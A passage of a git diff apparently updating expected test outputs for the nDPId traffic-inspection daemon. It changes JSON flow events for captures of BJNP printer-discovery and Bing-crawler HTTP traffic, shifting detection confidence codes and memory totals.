00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1467725384921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384921,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467725385125,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385125,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467725385329,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385329,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1467725385329} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 10/10 @@ -49,9 +49,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879273 bytes -~~ total memory freed........: 5879273 bytes -~~ total allocations/frees...: 118160/118160 +~~ total memory allocated....: 6012907 bytes +~~ total memory freed........: 6012907 bytes +~~ total allocations/frees...: 120922/120922 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 440 chars ~~ json string max len.......: 682 chars diff --git a/test/results/bot.pcap.out b/test/results/bot.pcap.out index d977743fe..c910d5a76 100644 --- a/test/results/bot.pcap.out +++ b/test/results/bot.pcap.out 
@@ -4,8 +4,8 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","packets-captured":402,"packets-processed":402,"total-skipped-flows":0,"total-l4-payload-len":407096,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1645108245896} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 402/402 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881323 bytes -~~ total memory freed........: 5881323 bytes -~~ total allocations/frees...: 118521/118521 +~~ total memory allocated....: 6014957 bytes +~~ total memory freed........: 6014957 bytes +~~ total allocations/frees...: 121283/121283 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 877 chars diff --git a/test/results/bt_search.pcap.out 